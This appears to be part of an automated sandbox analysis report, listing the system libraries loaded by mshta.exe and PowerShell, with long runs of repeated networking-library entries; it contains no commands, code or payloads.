Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
